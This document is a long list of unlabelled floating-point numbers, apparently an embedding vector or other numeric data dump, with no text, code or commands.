0.03310076892375946, -0.0034083074424415827, -0.0380123034119606, -0.022488875314593315, -0.01283696573227644, 0.003270635614171624, -0.03497608006000519, 0.0046622371301054955, -0.03515468165278435, 0.035750020295381546, -0.011713266372680664, -0.00008778903429629281, 0.016952237114310265, 0.004230617545545101, 0.018113145604729652, 0.030511049553751945, 0.019318703562021255, -0.001048352220095694, 0.0037636496126651764, 0.022697243839502335, -0.026388337835669518, 0.010857468470931053, 0.016327131539583206, -0.03363656997680664, -0.0008795182220637798, -0.00426410511136055, 0.009339357726275921, -0.0007516136392951012, 0.008491002023220062, 0.0011674197157844901, -0.015508543699979782, -0.012688132002949715, -0.02875480428338051, -0.036881159991025925, 0.009287266060709953, 0.026864606887102127, -0.006641734391450882, 0.004223175812512636, -0.008118916302919388, 0.03452957794070244, 0.00040557372267358005, -0.010835143737494946, -0.008319842629134655, -0.012472322210669518, -0.009450983256101608, -0.029975246638059616, -0.026224618777632713, -0.007091958541423082, -0.005536639131605625, -0.004777583759278059, 0.03229706361889839, 0.036643028259277344, -0.0034957476891577244, 0.026254385709762573, -0.0026846001856029034, -0.02747482806444168, -0.008260308764874935, 0.014243450947105885, -0.0019683348946273327, -0.026641355827450752, 0.03182079270482063, -0.0008362632361240685, -0.01574667915701866, -0.00845379289239645, 0.01613364741206169, -0.036553725600242615, 0.01942288689315319, -0.021863771602511406, 0.03467841073870659, -0.004040853586047888, -0.026224618777632713, -0.02489999309182167, 0.022488875314593315, 0.02158098667860031, -0.016178298741579056, -0.016565266996622086, -0.004617586731910706, -0.007434277795255184, 0.02250375971198082, 0.003350634127855301, -0.030898019671440125, 0.014764371328055859, 0.0008097520912997425, -0.0006860335124656558, 0.009711443446576595, -0.04512658715248108, 0.011259321123361588, 0.0012539296876639128, -0.023262815549969673, -0.01637178286910057, 0.008245425298810005, 0.009168198332190514, -0.019467538222670555, -0.027817146852612495, 0.016029464080929756, 0.019199635833501816, -0.0017971752677112818, -0.028055282309651375, -0.023620016872882843, 0.005064090248197317, -0.012368137948215008, -0.0010055623715743423, 0.01747315749526024, -0.007464044727385044, -0.004621307831257582, -0.042894069105386734, 0.005038043949753046, 0.030987320467829704, 0.020687980577349663, 0.004993393551558256, 0.002442744327709079, -0.02451302297413349, -0.017428506165742874, 0.005376642104238272, -0.03825043886899948, -0.0029822690412402153, -0.04509681835770607, 0.0060166302137076855, -0.009837953373789787, 0.04387637600302696, -0.05131809785962105, 0.022727010771632195, -0.00039487623143941164, 0.007601716555655003, 0.01980985701084137, -0.01140071451663971, -0.02501906082034111, 0.004572936799377203, 0.022429341450333595, -0.03372587263584137, -0.021000532433390617, -0.0172052551060915, -0.0022213533520698547, 0.001210209564305842, -0.01303045079112053, 0.01957172155380249, -0.007501253392547369, 0.002719948533922434, -0.007940314710140228, -0.05730123817920685, -0.020152175799012184, 0.0029525021091103554, 0.016743868589401245, -0.019884273409843445, -0.006146860308945179, 0.02827853336930275, 0.010544916614890099, -0.031404055655002594, -0.0036892325151711702, -0.03878623992204666, -0.004732933361083269, 0.0006618479383178055, -0.017190372571349144, -0.026537170633673668, 0.0007674273219890893, 0.0436977781355381, -0.02481069229543209, -0.0033934239763766527, -0.01969078928232193, 0.019378237426280975, -0.010783051140606403, 0.025182778015732765, -0.014756930060684681, -0.0048929303884506226, 0.0038957400247454643, 0.02309909649193287, -0.052687373012304306, 0.0010455616284161806, -0.021283317357301712, 0.0046808416955173016, 0.0015860165003687143, 0.024914877489209175, 0.009421216323971748, 0.023486066609621048, -0.016237832605838776, 0.027698079124093056, -0.009919811971485615, -0.013469512574374676, 0.02256329357624054, 0.004837117623537779, 0.010730959475040436, -0.014377402141690254, 0.021834004670381546, -0.00689847394824028, 0.0017339206533506513, -0.00009720746311359107, -0.0014455539640039206, 0.0412866584956646, -0.0030157568398863077, -0.025599515065550804, 0.004037132952362299, 0.0067645227536559105, 0.02034566178917885, -0.005696636158972979, 0.011579315178096294, -0.015597843565046787, 0.03268403187394142, -0.0006469644722528756, -0.01565737836062908, -0.013134635053575039, -0.06030769273638725, 0.008699369616806507, 0.011810008436441422, -0.009964462369680405, -0.013968107290565968, 0.029231073334813118, -0.014615536667406559, 0.03872670605778694, -0.01283696573227644, 0.003114359686151147, 0.007947755977511406, -0.005015718750655651, 0.036166757345199585, -0.03417237475514412, -0.02167028747498989, -0.018455464392900467, -0.020732630044221878, 0.0029841295909136534, 0.024036753922700882, 0.03848857432603836, -0.02756412886083126, 0.0013041613856330514, -0.031106386333703995, -0.014645303599536419, 0.0016678753308951855, 0.03572025150060654, -0.02158098667860031, -0.017279673367738724, 0.006984053645282984, -0.017711292952299118, 0.01291138306260109, -0.0323268286883831, 0.01619318127632141, 0.004948743619024754, -0.02327769808471203, -0.03893507644534111, 0.0206433292478323, -0.016416432335972786, -0.016088997945189476, 0.029543625190854073, 0.028382718563079834, -0.008855646476149559, -0.03366633877158165, 0.008051940239965916, -0.0008948667673394084, -0.006139418575912714, 0.011847217567265034, 0.005019439850002527, -0.009741210378706455, -0.004424102138727903, 0.010440732352435589, 0.020092641934752464, 0.027102742344141006, -0.02268236130475998, 0.009949578903615475, -0.01888708397746086, -0.004502240102738142, -0.024319538846611977, 0.0374169647693634, -0.00006709175067953765, -0.007557066157460213, -0.006939403247088194, 0.00016395037528127432, -0.016595033928751945, -0.041405726224184036, -0.009599817916750908, -0.00027185530052520335, 0.01699688658118248, -0.0035422584041953087, 0.004085503984242678, 0.015255524776875973, -0.0024873947259038687, -0.02217632345855236, -0.0024948364589363337, 0.02327769808471203, -0.01762199215590954, 0.00430875550955534, -0.009183081798255444, -0.016059231013059616, -0.003270635614171624, -0.017249906435608864, 0.0027683195658028126, -0.007650087587535381, 0.00782868918031454, -0.013089984655380249, 0.025718582794070244, -0.005358038004487753, -0.015419242903590202, -0.010180272161960602, -0.026299037039279938, -0.027757612988352776, -0.03506538271903992, -0.0221465565264225, -0.008148682303726673, -0.02854643575847149, -0.021119600161910057, 0.009093781001865864, 0.041256893426179886, 0.0043943352065980434, 0.007147771306335926, -0.015270408242940903, 0.012070468626916409, 0.013231377117335796, 0.0030883136205375195, -0.0046622371301054955, 0.0049226973205804825, 0.013201610185205936, -0.004677120596170425, 0.0086770448833704, 0.003899460891261697, 0.02309909649193287, 0.0036613258998841047, -0.009302149526774883, -0.02484045922756195, -0.007419394329190254, 0.02774273045361042, -0.010738400742411613, 0.0034678413067013025, 0.017636874690651894, 0.00787333957850933, -0.011348621919751167, 0.041495028883218765, -0.01101374439895153, 0.010083530098199844, -0.027549244463443756, 0.0021004253067076206, -0.0015348546439781785, -0.010120738297700882, -0.014816462993621826, -0.0014976459788158536, 0.0020520540419965982, -0.00038580663385801017, 0.019348470494151115, -0.0011199787259101868, 0.0033934239763766527, -0.030927786603569984, -0.030689651146531105, -0.0013329980429261923, -0.01132629718631506, -0.0017041537212207913, -0.02155121974647045, 0.0068203359842300415, -0.031136153265833855, 0.029707344248890877, 0.0094286585226655, -0.005413850769400597, -0.027965981513261795, -0.0010650961194187403, -0.0030864530708640814, 0.019080568104982376, 0.015553193166851997, 0.004122712649405003, 0.003966436255723238, 0.0004390614340081811, 0.020762396976351738, -0.014935530722141266, -0.012636039406061172, 0.01741362363100052, 0.010574683547019958, 0.002357164630666375, 0.023054447025060654, 0.002126471372321248, 0.008491002023220062, -0.025033943355083466, -0.004063178785145283, -0.008416584692895412, 0.006165464408695698, -0.006704989355057478, 0.022340042516589165, 0.015024831518530846, -0.006589642725884914, 0.0033748196437954903, 0.006704989355057478, 0.0225930605083704, 0.029915712773799896, -0.00423433817923069, -0.011609082110226154, 0.03825043886899948, 0.03417237475514412, 0.010172830894589424, 0.011743033304810524, 0.012725340202450752, 0.03464864566922188, -0.023992102593183517, 0.008446351625025272, -0.027936214581131935, -0.012338371016085148, -0.00036510935751721263, -0.006161743775010109, 0.019556839019060135, 0.0059794215485453606, 0.010522590950131416, 0.030808718875050545, -0.00391434459015727, -0.03271379694342613, -0.013581138104200363, -0.003462259890511632, -0.007601716555655003, -0.0320291593670845, 0.019318703562021255, -0.00842402596026659, -0.0025971601717174053, 0.009897487238049507, -0.006414762232452631, -0.0006678943173028529, -0.0009348660241812468, 0.0067496392875909805, -0.008118916302919388, -0.004546890500932932, 0.005171995144337416, -0.02549532987177372, -0.0007069633575156331, 0.019080568104982376, -0.002907851943746209, -0.00042929418850690126, 0.008111474104225636, -0.020866582170128822, -0.03043663315474987, -0.02999012917280197, 0.04500751942396164, -0.013134635053575039, 0.031344521790742874, -0.01021748036146164, 0.00472921272739768, -0.002987850457429886, 0.0001939498179126531, -0.0027180879842489958, 0.03164219111204147, 0.018634065985679626, 0.018336396664381027, -0.026641355827450752, 0.03324960172176361, -0.009584934450685978, 0.041703395545482635, 0.0015432265354320407, -0.021074948832392693, 0.0038324855268001556, 0.01210767775774002, 0.03310076892375946, 0.030808718875050545, 0.015136457048356533, -0.007984965108335018, 0.01613364741206169, -0.01786012575030327, 0.01660991832613945, 0.031404055655002594, 0.07328605651855469, -0.010924444533884525, -0.010738400742411613, 0.013447186909615993, 0.0070882379077374935, 0.0078584561124444, -0.00840914249420166, 0.01995869167149067, 0.006656617857515812, 0.007411952596157789, -0.015106690116226673, 0.006012909114360809, 0.006429645698517561, 0.026418104767799377, -0.01625271514058113, -0.013529045507311821, 0.019408004358410835, 0.018663832917809486, -0.046972133219242096, -0.017577340826392174, -0.027192043140530586, 0.016178298741579056, 0.005518035031855106, -0.0338151715695858, 0.014109499752521515, -0.007813805714249611, 0.018559647724032402, 0.005763611756265163, 0.02022659406065941, 0.0347081795334816, -0.016654567793011665, 0.007694737985730171, 0.0010883514769375324, 0.005026881583034992, -0.00956260971724987, 0.020390311256051064, -0.041405726224184036, 0.0016436898149549961, -0.007925431244075298, -0.03399377316236496, 0.013060217723250389, 0.002630647737532854, 0.03506538271903992, 0.0010074228048324585, -0.030957553535699844, -0.021982839331030846, -0.01660991832613945, 0.004465031437575817, -0.0014483446720987558, -0.011259321123361588, -0.012472322210669518, 0.014905763790011406, 0.011601640842854977, -0.008022173307836056, 0.014035082422196865, 0.018485231325030327, -0.027459945529699326, 0.02801063098013401, -0.007203584536910057, -0.01379694789648056, 0.023620016872882843, -0.01655038446187973, -0.006459412630647421, -0.01399043295532465, 0.0044203815050423145, 0.01607411354780197, 0.006143139209598303, -0.012643481604754925, -0.020792163908481598, 0.02190842106938362, 0.0136183463037014, 0.018544765189290047, -0.006585921626538038, 0.002638089470565319, 0.014399726875126362, -0.0003146452072542161, 0.017875010147690773, 0.031850557774305344, -0.024944644421339035, -0.0169075857847929, 0.01110304519534111, -0.015195990912616253, -0.014236009679734707, -0.004070620518177748, -0.0012018376728519797, -0.015389475971460342, -0.021208900958299637, 0.0085282102227211, -0.018961500376462936, 0.0007930082501843572, -0.04066155478358269, -0.017368972301483154, -0.021000532433390617, -0.0007716132677160203, -0.0030362214893102646, -0.006210114806890488, -0.00034022610634565353, 0.00215437775477767, 0.004513402935117483, -0.009510517120361328, 0.012003493495285511, 0.010068646632134914, 0.02492976002395153, 0.006325461436063051, 0.003932948689907789, -0.020211709663271904, 0.020390311256051064, 0.01660991832613945, 0.0011106766760349274, 0.025182778015732765, -0.004963626619428396, 0.025272078812122345, -0.005491988733410835, -0.00966679397970438, -0.021953072398900986, -0.037000227719545364, 0.024498140439391136, -0.023441415280103683, 0.007754271849989891, -0.01684805192053318, 0.00046301446855068207, 0.005038043949753046, 0.03357703983783722, -0.0005385944386944175, 0.014221126213669777, -0.023873036727309227, -0.003032500622794032, 0.005276178941130638, -0.009376566857099533, 0.007501253392547369, 0.003315286012366414, 0.0005488268216140568, 0.03289239853620529, -0.00876634567975998, -0.027698079124093056, 0.010917002335190773, -0.03244589641690254, -0.031165920197963715, -0.00424922164529562, 0.006976611912250519, -0.017651759088039398, -0.011497456580400467, 0.010016554035246372, 0.005893841851502657, -0.008394259959459305, 0.014302984811365604, 0.01138583105057478, -0.0007381255272775888, 0.00301947770640254, 0.000865564972627908, -0.0068054525181651115, -0.012784874066710472, 0.027936214581131935, 0.012360695749521255, 0.007754271849989891, -0.013231377117335796, 0.026983674615621567, -0.016654567793011665, -0.027579011395573616, -0.0040817828848958015, -0.024230238050222397, -0.025420913472771645, -0.010842585004866123, -0.015553193166851997, -0.010448173619806767, 0.000501850969158113, -0.014742046594619751, -0.00069859140785411, -0.0006027792696841061, -0.01577644608914852, 0.008074265904724598, 0.03887554258108139, 0.0010269572958350182, -0.026894373819231987, -0.016148531809449196, -0.01372253056615591, 0.01388624869287014, 0.012308604083955288, 0.011676058173179626, -0.005916167050600052, 0.004390614572912455, 0.018559647724032402, 0.027117624878883362, 0.0225930605083704, 0.015672260895371437, 0.001545086968690157, -0.0007971941959112883, 0.014957856386899948, 0.031136153265833855, -0.01966102235019207, -0.01454111933708191, -0.017726175487041473, 0.01628248207271099, 0.006184068974107504, 0.03399377316236496, -0.0011934657813981175, 0.006920799147337675, 0.007932872511446476, 0.0018567090155556798, 0.0086770448833704, -0.010299339890480042, -0.019586605951189995, -0.00046045638737268746, 0.001575784059241414, 0.03810160234570503, -0.01452623587101698, 0.03884577378630638, 0.017398739233613014, 0.015270408242940903, -0.007895664311945438, -0.012263953685760498, -0.036881159991025925, 0.015806211158633232, -0.014481586404144764, -0.014749487861990929, 0.002846457762643695, 0.0015357848023995757, 0.006946844980120659, 0.008416584692895412, -0.014593211933970451, -0.021268434822559357, 0.01110304519534111, -0.006377553567290306, 0.008580302819609642, -0.0025506492238491774, -0.0073784650303423405, -0.02457255683839321, 0.02292049489915371, -0.03307100012898445, 0.008171007968485355, 0.017249906435608864, 0.0043385224416852, -0.006392437033355236, -0.0014548561302945018, -0.010455615818500519, -0.017815476283431053, 0.00603895541280508, 0.006384995300322771, -0.010902118869125843, -0.02286096289753914, -0.0003532491100486368, -0.01111792866140604, -0.014102058485150337, -0.026135317981243134, 0.014087175019085407, 0.007188701070845127, -0.01678851991891861, 0.01714572124183178, -0.004985951818525791, -0.02303956262767315, -0.016446199268102646, -0.020955881103873253, 0.015582960098981857, -0.006701268255710602, 0.01969078928232193, 0.016386665403842926, 0.0009334706701338291, 0.010708633810281754, -0.003002733690664172, 0.017755942419171333, 0.019050801172852516, 0.01613364741206169, 0.0011860240483656526, -0.01565737836062908, -0.008267750032246113, -0.01966102235019207, -0.008111474104225636, 0.008171007968485355, -0.0157169122248888, -0.007664971053600311, -0.022756777703762054, -0.0019143823301419616, -0.014920647256076336, -0.02848690189421177, -0.007196142803877592, 0.009019363671541214, -0.004952464252710342, -0.006065001245588064, 0.0009357962408103049, 0.007664971053600311, -0.0015181107446551323, -0.018053611740469933, -0.0065673175267875195, 0.02999012917280197, -0.012665806338191032, 0.004543169867247343, -0.023783735930919647, -0.006481737829744816, -0.016118764877319336, 0.0007399859605357051, 0.025629281997680664, 0.012710456736385822, -0.018321514129638672, -0.0038324855268001556, -0.016773635521531105, -0.009890045039355755, -0.015181107446551323, -0.030600350350141525, -0.021625636145472527, -0.013610905036330223, 0.001635317807085812, 0.026165084913372993, 0.00020197291451040655, 0.003977599088102579, 0.02333723194897175, -0.007211026269942522, -0.005134786479175091, 0.015553193166851997, 0.010388640686869621, -0.004677120596170425, 0.0054585011675953865, 0.003836206393316388, -0.02016706019639969, 0.04396567866206169, 0.005291062407195568, 0.03524398431181908, -0.004025970119982958, -0.0008423096151091158, 0.008610069751739502, -0.01300068385899067, 0.004569215700030327, 0.00784357264637947, 0.018321514129638672, 0.003851089859381318, -0.00962214358150959, 0.02318839728832245, -0.01675875298678875, 0.008371934294700623, -0.0018808945314958692, -0.013774622231721878, 0.022101907059550285, 0.0057338448241353035, 0.01137094758450985, -0.018559647724032402, 0.005242691375315189, 0.0012204420054331422, -0.004781304858624935, 0.0036017922684550285, -0.013253701850771904, -0.006783127319067717, 0.009004480205476284, -0.0004809211241081357, 0.00219902815297246, -0.004513402935117483, 0.02848690189421177, 0.02513812854886055, 0.02043496072292328, 0.022101907059550285, 0.010797934606671333, -0.004059458151459694, -0.006087326444685459, 0.004290151409804821, -0.008260308764874935, -0.0009255638578906655, 0.002282747533172369, -0.007821246981620789, -0.01669921912252903, 0.007400789763778448, -0.014675070531666279, -0.010515149682760239, -0.012256511487066746, 0.00872169528156519, 0.02277166210114956, -0.0016762473387643695, -0.0005437106010504067, 0.0023832106962800026, 0.010038879700005054, -0.006195231340825558, -0.006872428115457296, -0.007445440161973238, -0.02193818800151348, 0.005246412009000778, 0.015761561691761017, -0.0023441417142748833, -0.016446199268102646, 0.002491115592420101, 0.0023366999812424183, -0.01894661784172058, -0.0010985838016495109, -0.004238059278577566, -0.020181942731142044, 0.018395930528640747, 0.010366315022110939, -0.008282633498311043, -0.02190842106938362, -0.006429645698517561, 0.006734756287187338, 0.00689847394824028, -0.003754347562789917, 0.011862101033329964, -0.017726175487041473, 0.015493660233914852, -0.031076619401574135, 0.004569215700030327, -0.018172679468989372, 0.010976536199450493, 0.00606872234493494, -0.004271546844393015, -0.002669716952368617, -0.017770826816558838, 0.0012790454784408212, -0.0057412865571677685, 0.014087175019085407, 0.010016554035246372, -0.004305034875869751, -0.005905004218220711, 0.004628749564290047, 0.01021748036146164, 0.005815703887492418, 0.013610905036330223, 0.0012018376728519797, 0.012316045351326466, 0.0010130041046068072, 0.018306629732251167, -0.0027478549163788557, 0.008535652421414852, 0.021804237738251686, -0.004807350691407919, 0.011832334101200104, 0.010574683547019958, 0.00030278495978564024, 0.006005467381328344, -0.0014167173067107797, 0.005272458307445049, -0.012316045351326466, 0.010343990288674831, 0.011958843097090721, 0.002556230640038848, -0.0389053076505661, -0.01117746252566576, -0.012360695749521255, 0.004025970119982958, 0.010098413564264774, -0.02277166210114956, -0.021387500688433647, 0.0010976536432281137, -0.017636874690651894, 0.011467689648270607, -0.0030883136205375195, -0.012249070219695568, -0.013052775524556637, 0.0273855272680521, 0.0041189915500581264, -0.019854506477713585, 0.00851332675665617, -0.006645455490797758, -0.027221810072660446, -0.006664059590548277, 0.00858774408698082, -0.00963702704757452, 0.017934544011950493, -0.011229554191231728, 0.010157947428524494, -0.003397144842892885, -0.017785709351301193, -0.011795124970376492, 0.0011357924668118358, 0.031523123383522034, 0.0026846001856029034, -0.01975032314658165, -0.006831498350948095, 0.00784357264637947, -0.007222188636660576, -0.009175639599561691, 0.014169033616781235, 0.02696879208087921, -0.00234972289763391, 0.018455464392900467, 0.012784874066710472, 0.0025246033910661936, -0.0219977218657732, -0.008982155472040176, 0.01568714529275894, -0.005075252614915371, -0.004007366020232439, -0.014072291553020477, 0.010381198488175869, 0.018142912536859512, -0.021149367094039917, 0.018157795071601868, 0.009711443446576595, -0.0070733544416725636, 0.0021785632707178593, 0.0004902232903987169, 0.009183081798255444, -0.0035590024199336767, 0.03476771339774132, 0.0041375961154699326, 0.008744020015001297, 0.008223099634051323, 0.011646291241049767, -0.011556990444660187, -0.015835978090763092, 0.004513402935117483, 0.0021525174379348755, 0.008267750032246113, -0.005134786479175091, 0.018485231325030327, 0.018812667578458786, -0.0034250514581799507, 0.01658015139400959, 0.01995869167149067, 0.009272382594645023, -0.008386817760765553, 0.0023943732958287, 0.01280719880014658, -0.01300068385899067, -0.007910547778010368, -0.0024873947259038687, -0.024006986990571022, 0.0016278760740533471, 0.020092641934752464, 0.003843648126348853, -0.01213744468986988, -0.007036145776510239, 0.013432303443551064, 0.0016753170639276505, -0.02534649707376957, 0.026179969310760498, 0.023902803659439087, 0.0021878655534237623, -0.008386817760765553, 0.013201610185205936, -0.016297364607453346, 0.015434126369655132, -0.010872351936995983, -0.008394259959459305, -0.0021599591709673405, -0.010038879700005054, -0.01027701422572136, -0.014064849354326725, -0.010931885801255703, 0.008133799768984318, 0.0030083151068538427, -0.004133875016123056, -0.015940163284540176, -0.007099400274455547, -0.00014999715494923294, 0.006734756287187338, 0.006630572024732828, -0.0005576638504862785, 0.018381046131253242, 0.002682739868760109, 0.016327131539583206, 0.0003962715563829988, -0.0031478472519665956, -0.029588276520371437, -0.0068054525181651115, 0.010887235403060913, 0.014853672124445438, 0.0033710990101099014, 0.03229706361889839, 0.011586757376790047, -0.007694737985730171, 0.008089149370789528, -0.013357886113226414, 0.0005269667599350214, 0.008699369616806507, -0.007467765361070633, 0.009733769111335278, 0.00424922164529562, 0.03223752975463867, -0.014377402141690254, 0.009733769111335278, 0.005491988733410835, 0.0036985345650464296, 0.005841749720275402, 0.009339357726275921, -0.00513850711286068, 0.013246260583400726, 0.007259397301822901, -0.0070324246771633625, 0.014637862332165241, -0.00468456232920289, -0.016178298741579056, -0.003330169478431344, -0.0012827663449570537, -0.02333723194897175, -0.03458911180496216, 0.00423433817923069, 0.014875996857881546, 0.03396400809288025, 0.007408231496810913, 0.019199635833501816, -0.018723366782069206, -0.000023618738850927912, -0.01363322976976633, -0.0037785330787301064, -0.052925508469343185, 0.028591085225343704, -0.014087175019085407, 0.02804039791226387, 0.012316045351326466, -0.016803402453660965, -0.022697243839502335, -0.03363656997680664, 0.004587819799780846, -0.029632925987243652, 0.007493811659514904, -0.008357050828635693, 0.0023404208477586508, -0.015642493963241577, 0.012018376961350441, -0.0038027185946702957, -0.0019311262294650078, 0.009056572802364826, 0.017458273097872734, -0.010046320967376232, -0.002647391753271222, -0.01210767775774002, -0.009971903637051582, 0.012115119025111198, 0.008371934294700623, 0.0025097199250012636, 0.0009297498036175966, 0.01134118065237999, 0.004461310803890228, -0.0018688017735257745, -0.012323487550020218, -0.012799757532775402, 0.003380401059985161, -0.013439745642244816, 0.000929284724406898, 0.052568305283784866, 0.009681676514446735, 0.006902194581925869, 0.0070398664101958275, -0.00864727795124054, -0.01788989268243313, 0.008461235091090202, 0.017428506165742874, -0.0011646291241049767, -0.00427898857742548, -0.024096287786960602, 0.021417267620563507, 0.014466702938079834, -0.010864910669624805, -0.014816462993621826, 0.011676058173179626, 0.011564431712031364, -0.008312400430440903, 0.008215658366680145, -0.011348621919751167, -0.004595261532813311, 0.0009064944460988045, -0.013089984655380249, -0.0086770448833704, -0.010887235403060913, 0.010946769267320633, 0.005246412009000778, -0.002357164630666375, 0.015389475971460342, -0.03372587263584137, 0.005774774122983217, 0.00962214358150959, -0.0008916109800338745, 0.012383021414279938, 0.000609290786087513, 0.015188549645245075, 0.0070398664101958275, -0.016505733132362366, -0.014325309544801712, 0.010917002335190773, -0.03193986043334007, -0.0009130059625022113, -0.013023008592426777, 0.010805376805365086, -0.006273369304835796, 0.002546928357332945, 0.030005013570189476, -0.006247323472052813, 0.008267750032246113, 0.010076087899506092, -0.001746013411320746, 0.0019088010303676128, -0.011036070063710213, -0.009495633654296398, 0.027221810072660446, -0.04899628087878227, 0.007880780845880508, -0.014742046594619751, 0.008141241036355495, -0.021208900958299637, 0.0043496848084032536, -0.0026920419186353683, -0.0033617967274039984, -0.018261980265378952, -0.00471432926133275, -0.01894661784172058, -0.00876634567975998, 0.016356898471713066, -0.028382718563079834, 0.010552357882261276, -0.014570886269211769, 0.01209279429167509, 0.0010939327767118812, -0.010611891746520996, 0.0024390234611928463, 0.005402688402682543, -0.0067794062197208405, -0.01672898605465889, -0.007992406375706196, -0.0017404321115463972, 0.006407320499420166, -0.010284456424415112, 0.0227418951690197, -0.002427860861644149, -0.012479763478040695, -0.015702027827501297, -0.008855646476149559, -0.0010790493106469512, 0.003707836614921689, 0.01963125541806221, -0.0007562647224403918, -0.010299339890480042, -0.0002025543071795255, -0.004989672917872667, -0.019943807274103165, -0.0032873796299099922, -0.015880629420280457, 0.011155137792229652, -0.017636874690651894, -0.0028557598125189543, 0.020181942731142044, 0.010463057085871696, -0.005339433904737234, 0.004238059278577566, -0.0019088010303676128, 0.011757916770875454, -0.03848857432603836, 0.0017850823933258653, 0.01601457968354225, -0.01921452023088932, -0.01640154980123043, 0.0017162465956062078, 0.008342167362570763, 0.01995869167149067, 0.0043645682744681835, 0.017577340826392174, 0.019199635833501816, 0.007155213039368391, -0.03405330702662468, 0.006891032215207815, -0.028561318293213844, 0.021238667890429497, 0.02184888906776905, -0.0044129397720098495, 0.0005888260202482343, 0.016267599537968636, 0.012390462681651115, 0.02540603093802929, 0.004822234157472849, -0.0034585390239953995, -0.004066899884492159, 0.0046808416955173016, 0.014861113391816616, 0.020449845120310783, -0.0035124914720654488, -0.007955198176205158, 0.011735591106116772, 0.004491077736020088, 0.004461310803890228, 0.0020799606572836637, 0.0028036676812916994, 0.006176627241075039, 0.02421535551548004, 0.013529045507311821, -0.024646975100040436, -0.00279436563141644, -0.011683499440550804, 0.0032427292317152023, 0.02262282744050026, 0.005607335362583399, 0.012889058329164982, 0.007248234935104847, -0.01280719880014658, -0.03884577378630638, 0.020628446713089943, -0.0033190068788826466, -0.009317032992839813, -0.010061204433441162, -0.0011618384160101414, -0.000865564972627908, 0.0003430167562328279, 0.011646291241049767, -0.00944354198873043, 0.0027404131833463907, 0.004732933361083269, -0.014392285607755184, -0.02170005440711975, 0.015218316577374935, -0.008401701226830482, -0.015166223980486393, -0.009220289997756481, -0.00941377505660057, -0.019794974476099014, -0.011735591106116772, -0.0025171616580337286, 0.0019199636299163103, -0.0009320753742940724, 0.016148531809449196, -0.005425013601779938, -0.005149669945240021, -0.018812667578458786, 0.002362745814025402, -0.026403220370411873, 0.00016883401258382946, -0.00941377505660057, 0.005905004218220711, 0.0406913235783577, -0.027757612988352776, -0.0005399897927418351, -0.018128028139472008, 0.028650619089603424, 0.011683499440550804, -0.011943959631025791, 0.006392437033355236, -0.0036464424338191748, 0.006597084458917379, -0.0025022781919687986, -0.022161440923810005, -0.00011040488607250154, -0.014228567481040955, -0.009867720305919647, -0.008476118557155132, 0.014355076476931572, 0.017547573894262314, -0.02487022615969181, -0.01210767775774002, -0.015850862488150597, 0.0242451224476099, 0.002422279678285122, -0.018038727343082428, -0.03155289217829704, -0.01117746252566576, -0.01565737836062908, -0.013462070375680923, -0.009465866722166538, -0.011631407774984837, 0.010009112767875195, -0.0005139437271282077, -0.004483636002987623, -0.012345812283456326, 0.01111792866140604, -0.011757916770875454, 0.003181335050612688, 0.005811982788145542, 0.00510874018073082, 0.007516136392951012, -0.009763536043465137, -0.013685322366654873, 0.0006497551221400499, -0.015359709039330482, -0.020896347239613533, 0.0008316121529787779, -0.014183917082846165, -0.0037115574814379215, -0.0036576050333678722, 0.009904928505420685, -0.0013534626923501492, -0.004732933361083269, -0.008610069751739502, 0.02908223867416382, 0.0006730104796588421, -0.011891867965459824, 0.01960148848593235, -0.013506720773875713, -0.0037710913456976414, 0.0019683348946273327, -0.017666641622781754, -0.011490014381706715, -0.008446351625025272, -0.005060369148850441, 0.0027385526336729527, 0.0015990394167602062, -0.013008125126361847, -0.005570127163082361, -0.008699369616806507, -0.004918976686894894, 0.013789505697786808, 0.006671501323580742, 0.00881099607795477, 0.011951401829719543, -0.011579315178096294, 0.010574683547019958, 0.004290151409804821, 0.007359860464930534, -0.00962214358150959, 0.019467538222670555, 0.010463057085871696, 0.0004583634145092219, -0.00951795931905508, -0.020598679780960083, -0.015478776767849922, 0.005767332389950752, 0.005376642104238272, 0.02774273045361042, -0.001418577739968896, -0.014146708883345127, -0.0065301088616251945, 0.009733769111335278, -0.0031013365369290113, 0.03964948281645775, -0.003765509929507971, -0.020777281373739243, -0.029067356139421463, 0.005506872199475765, 0.042626168578863144, 0.008892854675650597, -0.0020260082092136145, -0.0009223081287927926, -0.01397554948925972, -0.0041524795815348625, 0.0006818475667387247, -0.005331992171704769, -0.006965449545532465, -0.0013255563098937273, -0.01732432283461094, 0.008237983100116253, -0.010909561067819595, 0.008223099634051323, 0.014466702938079834, -0.002437163144350052, -0.012449996545910835, -0.004852001089602709, 0.006660338956862688, 0.012442555278539658, -0.017800593748688698, -0.02546556293964386, 0.005372921470552683, 0.0037841142620891333, -0.00644824979826808, 0.0051831575110554695, 0.02830830030143261, -0.001130211167037487, 0.014987623319029808, -0.003484585089609027, 0.01628248207271099, 0.01113281212747097, -0.0030045942403376102, 0.01277743186801672, -0.023813502863049507, -0.010783051140606403, 0.008877971209585667, -0.0038027185946702957, -0.011750474572181702, -0.02693902514874935, 0.0073561398312449455, 0.031791023910045624, 0.004037132952362299, 0.0008441700483672321, -0.01738385669887066, -0.009235173463821411, 0.03289239853620529, 0.016118764877319336, 0.006846381817013025, 0.006965449545532465, -0.028829220682382584, 0.009294707328081131, 0.007620320655405521, 0.0001938335335580632, 0.01978009007871151, 0.0009362613200210035, -0.002526463707908988, -0.009004480205476284, 0.009867720305919647, 0.01387136522680521, -0.024498140439391136, -0.013149518519639969, 0.005164553411304951, -0.007382185664027929, 0.002035310259088874, -0.006571038160473108, 0.005745007190853357, 0.0011553269578143954, 0.0005748728290200233, -0.00005988258635625243, 0.007851013913750648, 0.0021878655534237623, 0.008855646476149559, -0.04024481773376465, 0.005291062407195568, -0.0020520540419965982, -0.008863087743520737, -0.018217328935861588, -0.0062770904041826725, -0.00944354198873043, -0.010113297030329704, -0.014570886269211769, -0.008193332701921463, -0.01304533425718546, -0.02058379538357258, -0.003958994522690773, -0.0041189915500581264, -0.012516971677541733, 0.007058470975607634, 0.002442744327709079, -0.0057561700232326984, -0.029528742656111717, 0.010254689492285252, -0.013119751587510109, -0.029618043452501297, 0.005811982788145542, -0.002861341228708625, -0.026284152641892433, 0.004018528386950493, 0.011869542300701141, 0.010530033148825169, -0.01741362363100052, 0.03438074514269829, -0.00608360581099987, 0.005238970275968313, -0.007880780845880508, -0.01708618737757206, -0.009681676514446735, -0.016148531809449196, -0.01986939087510109, -0.002688321052119136, 0.0036166757345199585, -0.025004176422953606, -0.000014847102647763677, 0.015538309700787067, -0.004022249486297369, 0.015955045819282532, 0.01451135240495205, 0.014980181120336056, -0.006184068974107504, -0.0073784650303423405, 